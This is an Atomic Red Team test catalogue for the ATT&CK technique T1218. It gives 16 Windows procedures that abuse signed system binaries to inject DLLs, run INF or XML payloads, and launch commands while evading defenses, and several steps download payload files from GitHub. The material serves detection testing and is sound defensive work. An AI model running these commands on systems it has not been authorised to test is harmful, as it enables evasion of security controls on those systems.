# T1218 - Signed Binary Proxy Execution ## Description from ATT&CK > Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands. > > Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split) [Source](https://attack.mitre.org/techniques/T1218) ## Atomic Tests - [Atomic Test #1: mavinject - Inject DLL into running process](#atomic-test-1-mavinject---inject-dll-into-running-process) - [Atomic Test #2: Register-CimProvider - Execute evil dll](#atomic-test-2-register-cimprovider---execute-evil-dll) - [Atomic Test #3: InfDefaultInstall.exe .inf Execution](#atomic-test-3-infdefaultinstallexe-inf-execution) - [Atomic Test #4: ProtocolHandler.exe Downloaded a Suspicious File](#atomic-test-4-protocolhandlerexe-downloaded-a-suspicious-file) - [Atomic Test #5: Microsoft.Workflow.Compiler.exe Payload Execution](#atomic-test-5-microsoftworkflowcompilerexe-payload-execution) - [Atomic Test #6: Renamed Microsoft.Workflow.Compiler.exe Payload Executions](#atomic-test-6-renamed-microsoftworkflowcompilerexe-payload-executions) - [Atomic Test #7: Invoke-ATHRemoteFXvGPUDisablementCommand base test](#atomic-test-7-invoke-athremotefxvgpudisablementcommand-base-test) - [Atomic Test #8: DiskShadow Command Execution](#atomic-test-8-diskshadow-command-execution) - [Atomic Test #9: Load Arbitrary DLL via Wuauclt (Windows Update Client)](#atomic-test-9-load-arbitrary-dll-via-wuauclt-windows-update-client) - [Atomic Test #10: Lolbin Gpscript logon option](#atomic-test-10-lolbin-gpscript-logon-option) - [Atomic Test #11: Lolbin Gpscript startup option](#atomic-test-11-lolbin-gpscript-startup-option) - [Atomic Test #12: Lolbas ie4uinit.exe use as proxy](#atomic-test-12-lolbas-ie4uinitexe-use-as-proxy) - [Atomic Test #13: LOLBAS CustomShellHost to Spawn Process](#atomic-test-13-lolbas-customshellhost-to-spawn-process) - [Atomic Test #14: Provlaunch.exe Executes Arbitrary Command via Registry Key](#atomic-test-14-provlaunchexe-executes-arbitrary-command-via-registry-key) - [Atomic Test #15: LOLBAS Msedge to Spawn Process](#atomic-test-15-lolbas-msedge-to-spawn-process) - [Atomic Test #16: System Binary Proxy Execution - Wlrmdr Lolbin](#atomic-test-16-system-binary-proxy-execution---wlrmdr-lolbin) ### Atomic Test #1: mavinject - Inject DLL into running process Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. **Supported Platforms:** Windows **auto_generated_guid:** `c426dacf-575d-4937-8611-a148a86a5e61` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | process_id | PID of process receiving injection | string | 1000| | dll_payload | DLL to inject | path | PathToAtomicsFolder\T1218\src\x64\T1218.dll| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd mavinject.exe #{process_id} /INJECTRUNNING "#{dll_payload}" ``` #### Dependencies: Run with `powershell`! ##### Description: T1218.dll must exist on disk at specified location (#{dll_payload}) ###### Check Prereq Commands ```powershell if (Test-Path "#{dll_payload}") {exit 0} else {exit 1} ``` ###### Get Prereq Commands ```powershell New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" ``` ### Atomic Test #2: Register-CimProvider - Execute evil dll Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB **Supported Platforms:** Windows **auto_generated_guid:** `ad2c17ed-f626-4061-b21e-b9804a6f3655` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_payload | DLL to execute | path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll| #### Attack Commands: Run with `command_prompt`! ```cmd C:\Windows\SysWow64\Register-CimProvider.exe -Path "#{dll_payload}" ``` #### Dependencies: Run with `powershell`! ##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) ###### Check Prereq Commands ```powershell if (Test-Path "#{dll_payload}") {exit 0} else {exit 1} ``` ###### Get Prereq Commands ```powershell New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" ``` ### Atomic Test #3: InfDefaultInstall.exe .inf Execution Test execution of a .inf using InfDefaultInstall.exe Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml **Supported Platforms:** Windows **auto_generated_guid:** `54ad7d5a-a1b5-472c-b6c4-f8090fb2daef` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf| #### Attack Commands: Run with `command_prompt`! ```cmd InfDefaultInstall.exe "#{inf_to_execute}" ``` #### Dependencies: Run with `powershell`! ##### Description: INF file must exist on disk at specified location (#{inf_to_execute}) ###### Check Prereq Commands ```powershell if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1} ``` ###### Get Prereq Commands ```powershell New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" ``` ### Atomic Test #4: ProtocolHandler.exe Downloaded a Suspicious File Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. **Supported Platforms:** Windows **auto_generated_guid:** `db020456-125b-4c8b-a4a7-487df8afb5a2` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_url | url to document | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx| #### Attack Commands: Run with `command_prompt`! ```cmd FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" ``` #### Dependencies: Run with `powershell`! ##### Description: Microsoft Word must be installed ###### Check Prereq Commands ```powershell try { $wdApp = New-Object -COMObject "Word.Application" Stop-Process -Name "winword" exit 0 } catch { exit 1 } ``` ###### Get Prereq Commands ```powershell Write-Host "You will need to install Microsoft Word manually to meet this requirement" ``` ### Atomic Test #5: Microsoft.Workflow.Compiler.exe Payload Execution Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe **Supported Platforms:** Windows **auto_generated_guid:** `7cbb0f26-a4c1-4f77-b180-a009aa05637e` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml| | mwcpath | Default location of Microsoft.Workflow.Compiler.exe | path | C:\Windows\Microsoft.NET\Framework64\v4.0.30319| | mwcname | Default name of microsoft.workflow.compiler.exe | path | microsoft.workflow.compiler.exe| #### Attack Commands: Run with `powershell`! ```powershell #{mwcpath}\#{mwcname} "#{xml_payload}" output.txt ``` #### Dependencies: Run with `powershell`! ##### Description: .Net must be installed for this test to work correctly. ###### Check Prereq Commands ```powershell if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} ``` ###### Get Prereq Commands ```powershell write-host ".Net must be installed for this test to work correctly." ``` ### Atomic Test #6: Renamed Microsoft.Workflow.Compiler.exe Payload Executions Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe **Supported Platforms:** Windows **auto_generated_guid:** `4cc40fd7-87b8-4b16-b2d7-57534b86b911` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml| | renamed_binary | renamed Microsoft.Workflow.Compiler | path | PathToAtomicsFolder\..\ExternalPayloads\svchost.exe| | mwcpath | Default location of Microsoft.Workflow.Compiler.exe | path | C:\Windows\Microsoft.NET\Framework64\v4.0.30319| | mwcname | Default name of microsoft.workflow.compiler.exe | path | microsoft.workflow.compiler.exe| #### Attack Commands: Run with `powershell`! ```powershell &"#{renamed_binary}" "#{xml_payload}" output.txt ``` #### Dependencies: Run with `powershell`! ##### Description: .Net must be installed for this test to work correctly. ###### Check Prereq Commands ```powershell if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} ``` ###### Get Prereq Commands ```powershell New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force ``` ### Atomic Test #7: Invoke-ATHRemoteFXvGPUDisablementCommand base test RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted. Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe. The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts. Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 **Supported Platforms:** Windows **auto_generated_guid:** `9ebe7901-7edf-45c0-b5c7-8366300919db` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | module_name | Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified. | string | foo| | module_path | Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules. | string | $PWD| #### Attack Commands: Run with `powershell`! ```powershell Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path} ``` #### Dependencies: Run with `powershell`! ##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module. ###### Check Prereq Commands ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0} ``` ###### Get Prereq Commands ```powershell Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force ``` ### Atomic Test #8: DiskShadow Command Execution Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ **Supported Platforms:** Windows **auto_generated_guid:** `0e1483ba-8f0c-425d-b8c6-42736e058eaa` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | txt_payload | txt to execute | path | PathToAtomicsFolder\T1218\src\T1218.txt| | dspath | Default location of DiskShadow.exe | path | C:\Windows\System32\diskshadow.exe| #### Attack Commands: Run with `powershell`! ```powershell #{dspath} -S #{txt_payload} ``` #### Dependencies: Run with `powershell`! ##### Description: txt file must exist on disk at specified location (#{txt_payload}) ###### Check Prereq Commands ```powershell if (Test-Path "#{txt_payload}") {exit 0} else {exit 1} ``` ###### Get Prereq Commands ```powershell New-Item -Type Directory (split-path "#{txt_payload}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}" ``` ##### Description: DiskShadow.exe must exist on disk at specified location (#{dspath}) ###### Check Prereq Commands ```powershell if (Test-Path #{dspath}) {exit 0} else {exit 1} ``` ###### Get Prereq Commands ```powershell echo "DiskShadow.exe not found on disk at expected location" ``` ### Atomic Test #9: Load Arbitrary DLL via Wuauclt (Windows Update Client) This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. See https://dtm.uk/wuauclt/ **Supported Platforms:** Windows **auto_generated_guid:** `49fbd548-49e9-4bb7-94a6-3769613912b8` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | arbitrary_dll | Path of DLL to be loaded | string | PathToAtomicsFolder\T1218\bin\calc.dll| #### Attack Commands: Run with `command_prompt`! ```cmd wuauclt.exe /UpdateDeploymentProvider "#{arbitrary_dll}" /RunHandlerComServer ``` #### Cleanup Commands ```cmd taskkill /f /im calculator.exe > nul 2>&1 ``` #### Dependencies: Run with `powershell`! ##### Description: DLL to load must exist on disk as specified location (#{arbitrary_dll}) ###### Check Prereq Commands ```powershell if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1} ``` ###### Get Prereq Commands ```powershell New-Item -Type Directory (split-path "#{arbitrary_dll}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}" ``` ### Atomic Test #10: Lolbin Gpscript logon option Executes logon scripts configured in Group Policy. https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ **Supported Platforms:** Windows **auto_generated_guid:** `5bcda9cd-8e85-48fa-861d-b5a85d91d48c` #### Attack Commands: Run with `command_prompt`! ```cmd Gpscript /logon ``` ### Atomic Test #11: Lolbin Gpscript startup option Executes startup scripts configured in Group Policy https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ **Supported Platforms:** Windows **auto_generated_guid:** `f8da74bb-21b8-4af9-8d84-f2c8e4a220e3` #### Attack Commands: Run with `command_prompt`! ```cmd Gpscript /startup ``` ### Atomic Test #12: Lolbas ie4uinit.exe use as proxy Executes commands from a specially prepared ie4uinit.inf file. Poc from : https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/ **Supported Platforms:** Windows **auto_generated_guid:** `13c0804e-615e-43ad-b223-2dfbacd0b0b3` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | Path_inf | Path to the cab file | path | PathToAtomicsFolder\T1218\src\ieuinit.inf| | Path_ie4uinit | Path to ie4uinit.exe | path | c:\windows\system32\ie4uinit.exe| #### Attack Commands: Run with `command_prompt`! ```cmd copy #{Path_ie4uinit} %TEMP%\ie4uinit.exe copy "#{Path_inf}" %TEMP%\ieuinit.inf %TEMP%\ie4uinit.exe -BaseSettings ``` #### Cleanup Commands ```cmd del %TEMP%\ie4uinit.exe >nul 2>&1 del %TEMP%\ieuinit.inf >nul 2>&1 ``` #### Dependencies: Run with `powershell`! ##### Description: ieuinit.inf must exist on disk at specified location (#{Path_inf}) ###### Check Prereq Commands ```powershell if (Test-Path "#{Path_inf}") {exit 0} else {exit 1} ``` ###### Get Prereq Commands ```powershell New-Item -Type Directory (split-path "#{Path_inf}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/ieuinit.inf" -OutFile "#{Path_inf}" ``` ### Atomic Test #13: LOLBAS CustomShellHost to Spawn Process This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`. Upon execution, customshellhost.exe will spawn calc.exe. Note this will only work on Windows 10 or 11. [LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/) [BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins) **Supported Platforms:** Windows **auto_generated_guid:** `b1eeb683-90bb-4365-bbc2-2689015782fe` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | dest_path | Directory to copy files into | path | C:\test| #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell if (-not (Test-Path #{dest_path})) { New-Item -Path #{dest_path} -ItemType Directory } else { Write-Host "Directory #{dest_path} already exists." } Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force #{dest_path}\customshellhost.exe ``` #### Cleanup Commands ```powershell Remove-Item -Path #{dest_path} -Recurse -Force ``` ### Atomic Test #14: Provlaunch.exe Executes Arbitrary Command via Registry Key Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command. - https://twitter.com/0gtweet/status/1674399582162153472 - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ Registry keys are deleted after successful execution. **Supported Platforms:** Windows **auto_generated_guid:** `ab76e34f-28bf-441f-a39c-8db4835b89cc` #### Attack Commands: Run with `command_prompt`! ```cmd reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0 reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe c:\windows\system32\provlaunch.exe LOLBin ``` ### Atomic Test #15: LOLBAS Msedge to Spawn Process Executes a process under a trusted Microsoft signed binary,mseddge. This test will spawn "calc.exe" as a child process of msedge.exe - https://lolbas-project.github.io/lolbas/Binaries/Msedge/ **Supported Platforms:** Windows **auto_generated_guid:** `e5eedaed-ad42-4c1e-8783-19529738a349` #### Attack Commands: Run with `powershell`! ```powershell $edgePath64 = "C:\Program Files\Microsoft\Edge\Application\msedge.exe" if (Test-Path $edgePath64) { $edgePath = $edgePath64 } else { # Check 32-bit Edge installation path $edgePath32 = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" if (Test-Path $edgePath32) { $edgePath = $edgePath32 } else { exit 1 } } & $edgePath --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\calc.exe &&" sleep 5 taskkill -f -im msedge.exe taskkill -f -im calc.exe taskkill -f -im win32calc.exe ``` ### Atomic Test #16: System Binary Proxy Execution - Wlrmdr Lolbin Use wlrmdr(Windows Logon Reminder executable) as a proxy binary to evade defensive countermeasures **Supported Platforms:** Windows **auto_generated_guid:** `7816c252-b728-4ea6-a683-bd9441ca0b71` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | payload_path | Path to the executable | String | C:\Windows\System32\calc.exe| #### Attack Commands: Run with `powershell`! ```powershell wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u "#{payload_path}" ```